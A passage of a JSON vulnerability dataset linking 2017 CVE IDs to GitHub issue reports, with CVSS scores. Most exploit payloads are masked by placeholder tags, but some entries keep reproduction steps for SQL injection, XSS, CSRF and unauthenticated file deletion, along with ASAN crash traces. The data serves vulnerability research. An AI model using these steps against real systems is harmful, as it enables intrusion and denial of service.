  14776. "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG cc1 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fc NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
  14777. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14778. "severity": "MEDIUM",
  14779. "baseScore": 6.5,
  14780. "impactScore": 3.6,
  14781. "exploitabilityScore": 2.8
  14782. },
  14783. {
  14784. "CVE_ID": "CVE-2017-8368",
  14785. "Issue_Url_old": "https://github.com/SublimeTextIssues/Core/issues/1700",
  14786. "Issue_Url_new": "https://github.com/sublimehq/sublime_text/issues/1700",
  14787. "Repo_new": "sublimehq/sublime_text",
  14788. "Issue_Created_At": "2017-05-01T17:00:58Z",
  14789. "description": "A Denial of Service Vulnerability ( CVETAG ) in Sublime Text NUMBERTAG Build NUMBERTAG I found this vulnerability and you should fix it. The Common Vulnerabilities and Exposures (CVE) project has assigned the ID CVETAG to this issue. Summary Sublime Text NUMBERTAG Build NUMBERTAG might allow user-assisted attackers to execute code via a crafted file. Expected behavior Follow the commands in APITAG to reproduce\" Actual behavior Crash Steps to reproduce Details and Proof of Concept will be sent by a proper contact way if you can provide it for me, but these will not be posted here since it is Not fixed yet. Environment Windows NUMBERTAG Sublime Text: Build NUMBERTAG",
  14790. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14791. "severity": "HIGH",
  14792. "baseScore": 7.8,
  14793. "impactScore": 5.9,
  14794. "exploitabilityScore": 1.8
  14795. },
  14796. {
  14797. "CVE_ID": "CVE-2017-8376",
  14798. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/72",
  14799. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/72",
  14800. "Repo_new": "semplon/genixcms",
  14801. "Issue_Created_At": "2017-04-25T03:53:19Z",
  14802. "description": "SQL Injection in version NUMBERTAG I found a SQL injection at PATHTAG line NUMBERTAG APITAG Go to URLTAG , find a menu and click the del button. Change the position of menuid and token, change menuid into : APITAG exp: APITAG FILETAG BTW: could I request a CVE for this?",
  14803. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  14804. "severity": "MEDIUM",
  14805. "baseScore": 5.4,
  14806. "impactScore": 2.7,
  14807. "exploitabilityScore": 2.3
  14808. },
  14809. {
  14810. "CVE_ID": "CVE-2017-8382",
  14811. "Issue_Url_old": "https://github.com/Admidio/admidio/issues/612",
  14812. "Issue_Url_new": "https://github.com/admidio/admidio/issues/612",
  14813. "Repo_new": "admidio/admidio",
  14814. "Issue_Created_At": "2017-05-15T10:06:19Z",
  14815. "description": "CSRF in Admidio NUMBERTAG Hello, I would like to report a vulnerability that I have found in Admidio NUMBERTAG in which a Cross Site Request Forgery (CSRF) attack is possible. For details please go through the attached document. FILETAG Regards, Faiz Ahmed Zaidi",
  14816. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H",
  14817. "severity": "MEDIUM",
  14818. "baseScore": 4.5,
  14819. "impactScore": 3.6,
  14820. "exploitabilityScore": 0.9
  14821. },
  14822. {
  14823. "CVE_ID": "CVE-2017-8400",
  14824. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/13",
  14825. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/13",
  14826. "Repo_new": "matthiaskramm/swftools",
  14827. "Issue_Created_At": "2017-04-26T13:02:19Z",
  14828. "description": "Segmentation Fault:out of bound write of heap data issue can occur in function APITAG Recently, I found an out of bound issue in the newest branch of swftools which can cause the segmentation fault. This issue can be caused by a malformed PNG file though png2swf. Attackers could exploit this issue to result n APITAG and might cause arbitrary code execution. The crash infomation is as follows. compiled normally $ analysis ./png2swf test FILETAG NUMBERTAG segmentation fault ./png2swf test FILETAG compiled with CFLAGS=\u2019 fsanitize=address\u2019 $ analysis ./png2swf dbg FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG at pc NUMBERTAG a3fa bp NUMBERTAG fffe NUMBERTAG sp NUMBERTAG fffe NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG thread T NUMBERTAG a3f9 in png_load PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG af7d in main PATHTAG NUMBERTAG f NUMBERTAG a8c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG d NUMBERTAG in png_load PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG png_load Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb NUMBERTAG c NUMBERTAG fffb6a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffb6f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 
NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The attachment is the zip package of APITAG and a brief analysis. APITAG APITAG",
  14829. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  14830. "severity": "HIGH",
  14831. "baseScore": 8.8,
  14832. "impactScore": 5.9,
  14833. "exploitabilityScore": 2.8
  14834. },
  14835. {
  14836. "CVE_ID": "CVE-2017-8401",
  14837. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/14",
  14838. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/14",
  14839. "Repo_new": "matthiaskramm/swftools",
  14840. "Issue_Created_At": "2017-04-26T15:53:51Z",
  14841. "description": "Segmentation Fault:An out of bound read of heap data issue can occur in function APITAG An out of bound read of heap data issue can occur in function APITAG This issue can be caused by a malformed PNG file though png2swf. Attackers could exploit this issue to result in APITAG compiled normally \u279c analysis ./png2swf test FILETAG NUMBERTAG segmentation fault ./png2swf test FILETAG compiled with CFLAGS=\u2019 APITAG \u279c analysis ./png2swf dbg FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG c bp NUMBERTAG ffdf NUMBERTAG becc0 sp NUMBERTAG ffdf NUMBERTAG becb0 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG b in png_load PATHTAG NUMBERTAG e in APITAG PATHTAG NUMBERTAG af7d in main PATHTAG NUMBERTAG f5fefa8e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f5ff NUMBERTAG in malloc ( PATHTAG NUMBERTAG bd in png_load PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG png_load Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG c NUMBERTAG fff8d NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd 
Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING The attachment is the APITAG and a brief report. APITAG APITAG",
  14842. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14843. "severity": "MEDIUM",
  14844. "baseScore": 6.5,
  14845. "impactScore": 3.6,
  14846. "exploitabilityScore": 2.8
  14847. },
  14848. {
  14849. "CVE_ID": "CVE-2017-8418",
  14850. "Issue_Url_old": "https://github.com/bbatsov/rubocop/issues/4336",
  14851. "Issue_Url_new": "https://github.com/rubocop/rubocop/issues/4336",
  14852. "Repo_new": "rubocop/rubocop",
  14853. "Issue_Created_At": "2017-05-01T16:33:53Z",
  14854. "description": "Insecure use of /tmp. Actual behavior APITAG uses APITAG to store cache files insecurely. Malicious local users could exploit this to tamper with cache files belonging to other users. Expected behavior APITAG should not abuse APITAG for cache. Please consider adopting FILETAG , which says cache should be stored in APITAG or APITAG . Steps to reproduce the problem Proof of concept exploit: ERRORTAG APITAG version NUMBERTAG using Parser NUMBERTAG running on ruby NUMBERTAG i NUMBERTAG linux gnu)",
  14855. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
  14856. "severity": "LOW",
  14857. "baseScore": 3.3,
  14858. "impactScore": 1.4,
  14859. "exploitabilityScore": 1.8
  14860. },
  14861. {
  14862. "CVE_ID": "CVE-2017-8458",
  14863. "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/4748",
  14864. "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/4748",
  14865. "Repo_new": "brave/browser-laptop",
  14866. "Issue_Created_At": "2016-10-13T19:30:20Z",
  14867. "description": "APITAG report: URL obfuscation. URLTAG Verified on OS NUMBERTAG Steps to Reproduce NUMBERTAG go to FILETAG NUMBERTAG urlbar makes it look like we are at brave.com when the page displayed is example.com Expected behavior urlbar should show the actual page location, which is FILETAG",
  14868. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  14869. "severity": "MEDIUM",
  14870. "baseScore": 6.5,
  14871. "impactScore": 3.6,
  14872. "exploitabilityScore": 2.8
  14873. },
  14874. {
  14875. "CVE_ID": "CVE-2017-8762",
  14876. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/73",
  14877. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/73",
  14878. "Repo_new": "semplon/genixcms",
  14879. "Issue_Created_At": "2017-05-03T18:38:11Z",
  14880. "description": "XSS in APITAG NUMBERTAG latest). Register a user and submit a page whose content contains an XSS payload APITAG APITAG When the administrator opens the admin backend to view this page, the XSS will take effect. APITAG",
  14881. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  14882. "severity": "MEDIUM",
  14883. "baseScore": 5.4,
  14884. "impactScore": 2.7,
  14885. "exploitabilityScore": 2.3
  14886. },
  14887. {
  14888. "CVE_ID": "CVE-2017-8763",
  14889. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/182",
  14890. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/182",
  14891. "Repo_new": "Telaxus/EPESI",
  14892. "Issue_Created_At": "2017-05-02T11:03:08Z",
  14893. "description": "Cross Site Scripting . file: FILETAG code: APITAG poc: APITAG FILETAG",
  14894. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14895. "severity": "MEDIUM",
  14896. "baseScore": 6.1,
  14897. "impactScore": 2.7,
  14898. "exploitabilityScore": 2.8
  14899. },
  14900. {
  14901. "CVE_ID": "CVE-2017-8765",
  14902. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/466",
  14903. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/466",
  14904. "Repo_new": "imagemagick/imagemagick",
  14905. "Issue_Created_At": "2017-05-03T08:36:29Z",
  14906. "description": "memory leak in APITAG APITAG NUMBERTAG magick identify $FILE When identifying an icon file, imagemagick will allocate memory to store the colormap in function APITAG in coders\\icon.c, line NUMBERTAG if APITAG >colors,exception) == APITAG image >colors can be controlled, as it is assigned as follows (line NUMBERTAG if APITAG NUMBERTAG APITAG APITAG APITAG image APITAG //can be controlled if (image >colors NUMBERTAG image >colors=one << APITAG } APITAG is taken directly from the icon file without checking( line NUMBERTAG APITAG //can be controlled by modifying the icon file So, modifying the number_colors can cause APITAG to allocate an arbitrarily sized amount of memory; this may cause memory exhaustion Reproducer: Credit: APITAG of Venustech",
  14907. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14908. "severity": "MEDIUM",
  14909. "baseScore": 6.5,
  14910. "impactScore": 3.6,
  14911. "exploitabilityScore": 2.8
  14912. },
  14913. {
  14914. "CVE_ID": "CVE-2017-8780",
  14915. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/74",
  14916. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/74",
  14917. "Repo_new": "semplon/genixcms",
  14918. "Issue_Created_At": "2017-05-04T05:21:59Z",
  14919. "description": "Comment XSS. Leave a comment with payload: APITAG aaaa</p if an admin publishes this comment, it will take effect.",
  14920. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  14921. "severity": "MEDIUM",
  14922. "baseScore": 4.8,
  14923. "impactScore": 2.7,
  14924. "exploitabilityScore": 1.7
  14925. },
  14926. {
  14927. "CVE_ID": "CVE-2017-8799",
  14928. "Issue_Url_old": "https://github.com/irods/irods/issues/3452",
  14929. "Issue_Url_new": "https://github.com/irods/irods/issues/3452",
  14930. "Repo_new": "irods/irods",
  14931. "Issue_Created_At": "2017-01-20T18:54:36Z",
  14932. "description": "igetwild bash cleanup.",
  14933. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  14934. "severity": "CRITICAL",
  14935. "baseScore": 9.8,
  14936. "impactScore": 5.9,
  14937. "exploitabilityScore": 3.9
  14938. },
  14939. {
  14940. "CVE_ID": "CVE-2017-8825",
  14941. "Issue_Url_old": "https://github.com/dinhviethoa/libetpan/issues/274",
  14942. "Issue_Url_new": "https://github.com/dinhvh/libetpan/issues/274",
  14943. "Repo_new": "dinhvh/libetpan",
  14944. "Issue_Created_At": "2017-04-28T15:47:20Z",
  14945. "description": "Segmentation faults in mime handling. Hello, I was using American Fuzzy Lop (afl fuzz) to fuzz input to the mime parse test program. Is fixing these crashes something you're interested in? The input files can be found here: URLTAG The files can be executed as APITAG to cause seg faults. Let me know if I can provide any more information to help narrow down this issue.",
  14946. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  14947. "severity": "HIGH",
  14948. "baseScore": 7.5,
  14949. "impactScore": 3.6,
  14950. "exploitabilityScore": 3.9
  14951. },
  14952. {
  14953. "CVE_ID": "CVE-2017-8827",
  14954. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/75",
  14955. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/75",
  14956. "Repo_new": "semplon/genixcms",
  14957. "Issue_Created_At": "2017-05-05T09:39:05Z",
  14958. "description": "Arbitrary User Password Reset Vulnerability. FILETAG DOES NOT limit how frequently users can submit the password-reset form. If an attacker sends the request repeatedly within a short time, the target user will be unable to log into his account because his password is changed repeatedly. POST FILETAG APITAG",
  14959. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  14960. "severity": "CRITICAL",
  14961. "baseScore": 9.1,
  14962. "impactScore": 5.2,
  14963. "exploitabilityScore": 3.9
  14964. },
  14965. {
  14966. "CVE_ID": "CVE-2017-8830",
  14967. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/467",
  14968. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/467",
  14969. "Repo_new": "imagemagick/imagemagick",
  14970. "Issue_Created_At": "2017-05-03T10:52:09Z",
  14971. "description": "memory leak in APITAG APITAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: URLTAG URLTAG Author: bird APITAG",
  14972. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14973. "severity": "MEDIUM",
  14974. "baseScore": 6.5,
  14975. "impactScore": 3.6,
  14976. "exploitabilityScore": 2.8
  14977. },
  14978. {
  14979. "CVE_ID": "CVE-2017-8833",
  14980. "Issue_Url_old": "https://github.com/zencart/zencart/issues/1431",
  14981. "Issue_Url_new": "https://github.com/zencart/zencart/issues/1431",
  14982. "Repo_new": "zencart/zencart",
  14983. "Issue_Created_At": "2017-05-07T11:23:09Z",
  14984. "description": "Version NUMBERTAG ersion NUMBERTAG Hi, I'm in your NUMBERTAG ersion open source found to FILETAG this page parameter value ID does not filter in the output or filter or escape the input character to cause XSS Poc Payload\uff1a URLTAG Resolving: Filtering encoding or escaping FILETAG FILETAG FILETAG",
  14985. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  14986. "severity": "MEDIUM",
  14987. "baseScore": 6.1,
  14988. "impactScore": 2.7,
  14989. "exploitabilityScore": 2.8
  14990. },
  14991. {
  14992. "CVE_ID": "CVE-2017-8842",
  14993. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/66",
  14994. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/66",
  14995. "Repo_new": "ckolivas/lrzip",
  14996. "Issue_Created_At": "2017-03-24T15:44:45Z",
  14997. "description": "divide by zero in APITAG (libzpaq.h). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  14998. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  14999. "severity": "MEDIUM",
  15000. "baseScore": 5.5,
  15001. "impactScore": 3.6,
  15002. "exploitabilityScore": 1.8
  15003. },
  15004. {
  15005. "CVE_ID": "CVE-2017-8843",
  15006. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/69",
  15007. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/69",
  15008. "Repo_new": "ckolivas/lrzip",
  15009. "Issue_Created_At": "2017-03-24T15:56:13Z",
  15010. "description": "NULL pointer dereference in join_pthread (stream.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  15011. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15012. "severity": "MEDIUM",
  15013. "baseScore": 5.5,
  15014. "impactScore": 3.6,
  15015. "exploitabilityScore": 1.8
  15016. },
  15017. {
  15018. "CVE_ID": "CVE-2017-8844",
  15019. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/70",
  15020. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/70",
  15021. "Repo_new": "ckolivas/lrzip",
  15022. "Issue_Created_At": "2017-03-24T16:08:35Z",
  15023. "description": "heap based buffer overflow write in read NUMBERTAG g (stream.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  15024. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15025. "severity": "HIGH",
  15026. "baseScore": 7.8,
  15027. "impactScore": 5.9,
  15028. "exploitabilityScore": 1.8
  15029. },
  15030. {
  15031. "CVE_ID": "CVE-2017-8845",
  15032. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/68",
  15033. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/68",
  15034. "Repo_new": "ckolivas/lrzip",
  15035. "Issue_Created_At": "2017-03-24T15:51:37Z",
  15036. "description": "invalid memory read in lzo1x_decompress APITAG On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  15037. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15038. "severity": "MEDIUM",
  15039. "baseScore": 5.5,
  15040. "impactScore": 3.6,
  15041. "exploitabilityScore": 1.8
  15042. },
  15043. {
  15044. "CVE_ID": "CVE-2017-8846",
  15045. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/71",
  15046. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/71",
  15047. "Repo_new": "ckolivas/lrzip",
  15048. "Issue_Created_At": "2017-03-24T16:10:33Z",
  15049. "description": "use after free in read_stream (stream.c). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  15050. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15051. "severity": "MEDIUM",
  15052. "baseScore": 5.5,
  15053. "impactScore": 3.6,
  15054. "exploitabilityScore": 1.8
  15055. },
  15056. {
  15057. "CVE_ID": "CVE-2017-8847",
  15058. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/67",
  15059. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/67",
  15060. "Repo_new": "ckolivas/lrzip",
  15061. "Issue_Created_At": "2017-03-24T15:46:53Z",
  15062. "description": "NULL pointer dereference in APITAG (libzpaq.h). On NUMBERTAG ERRORTAG Reproducer: URLTAG",
  15063. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15064. "severity": "MEDIUM",
  15065. "baseScore": 5.5,
  15066. "impactScore": 3.6,
  15067. "exploitabilityScore": 1.8
  15068. },
  15069. {
  15070. "CVE_ID": "CVE-2017-8848",
  15071. "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/16",
  15072. "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/16",
  15073. "Repo_new": "s3131212/allendisk",
  15074. "Issue_Created_At": "2017-05-08T15:11:17Z",
  15075. "description": "Change password exists CSRF Vulnerability (any change password). Version NUMBERTAG I found in your version NUMBERTAG that the change password did not produce a related token, resulting in a CSRF vulnerability Affected Files:",
  15076. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  15077. "severity": "MEDIUM",
  15078. "baseScore": 6.5,
  15079. "impactScore": 3.6,
  15080. "exploitabilityScore": 2.8
  15081. },
  15082. {
  15083. "CVE_ID": "CVE-2017-8853",
  15084. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/2",
  15085. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/2",
  15086. "Repo_new": "fiyocms/fiyocms",
  15087. "Issue_Created_At": "2017-04-17T08:12:06Z",
  15088. "description": "A any file delete vulnerability . I found that Fiyo CMS version NUMBERTAG has a any file delete vulnerability that do not need login. FILETAG There is not any checking about the $_POST['act'] $_POST[file] , client can control these two input to cause any file deletion . reproduce(this will delete .htaccess file): Url: URLTAG PATHTAG POST: APITAG Referrer: URLTAG Discoverer: APITAG of APITAG",
  15089. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  15090. "severity": "HIGH",
  15091. "baseScore": 7.5,
  15092. "impactScore": 3.6,
  15093. "exploitabilityScore": 3.9
  15094. },
  15095. {
  15096. "CVE_ID": "CVE-2017-8868",
  15097. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/30",
  15098. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/30",
  15099. "Repo_new": "flatcore/flatcore-cms",
  15100. "Issue_Created_At": "2017-05-08T10:52:28Z",
  15101. "description": "Unprotected sqlite file deletion. There is a vulnerability in flatcore cms NUMBERTAG B NUMBERTAG which could delete APITAG file. And by exploiting this vulnerability the application won't be accessible. This vulnerability occurs because the file deletion request is just a GET request and there is no CSRF protection on the endpoint This is the request is URLTAG",
  15102. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  15103. "severity": "HIGH",
  15104. "baseScore": 7.5,
  15105. "impactScore": 3.6,
  15106. "exploitabilityScore": 3.9
  15107. },
  15108. {
  15109. "CVE_ID": "CVE-2017-8874",
  15110. "Issue_Url_old": "https://github.com/mautic/mautic/issues/3486",
  15111. "Issue_Url_new": "https://github.com/mautic/mautic/issues/3486",
  15112. "Repo_new": "mautic/mautic",
  15113. "Issue_Created_At": "2017-02-21T15:45:50Z",
  15114. "description": "Authenticated CSRF in Delete Campaign / Contact. What type of report is this: | Q | A | | | Bug report? | Y | Feature request? | | Enhancement? | Description: Mautic suffers from autnehticated CSRF in which an attacker can trick a user/admin to delete campaigns or contacts. These two operations are not protected with an anti CSRF token. Other operations, e.g., adding contacts/campaigns are protected. If a bug: | Q | A | | | Mautic version NUMBERTAG as taken from Bitnami appliances) | PHP version | Steps to reproduce NUMBERTAG Get valid user session cookies and an ID of a campaign (or a contact NUMBERTAG Do a POST request (including the above cookies) to PATHTAG APITAG PATHTAG APITAG APITAG Replace APITAG with the ID of step NUMBERTAG Log errors: N.A.",
  15115. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15116. "severity": "HIGH",
  15117. "baseScore": 8.8,
  15118. "impactScore": 5.9,
  15119. "exploitabilityScore": 2.8
  15120. },
  15121. {
  15122. "CVE_ID": "CVE-2017-8891",
  15123. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/87",
  15124. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/87",
  15125. "Repo_new": "dropbox/lepton",
  15126. "Issue_Created_At": "2017-04-01T19:51:39Z",
  15127. "description": "SEGFAULT: Malformed lepton file generated by AFL + APITAG Hi, all. This malformed lepton file can cause crash. It can cause APITAG of lepton. Here is ASAN result and I attached the FILETAG . Thanks. ERRORTAG",
  15128. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15129. "severity": "MEDIUM",
  15130. "baseScore": 5.5,
  15131. "impactScore": 3.6,
  15132. "exploitabilityScore": 1.8
  15133. },
  15134. {
  15135. "CVE_ID": "CVE-2017-8911",
  15136. "Issue_Url_old": "https://github.com/verdammelt/tnef/issues/23",
  15137. "Issue_Url_new": "https://github.com/verdammelt/tnef/issues/23",
  15138. "Repo_new": "verdammelt/tnef",
  15139. "Issue_Created_At": "2017-05-10T08:48:17Z",
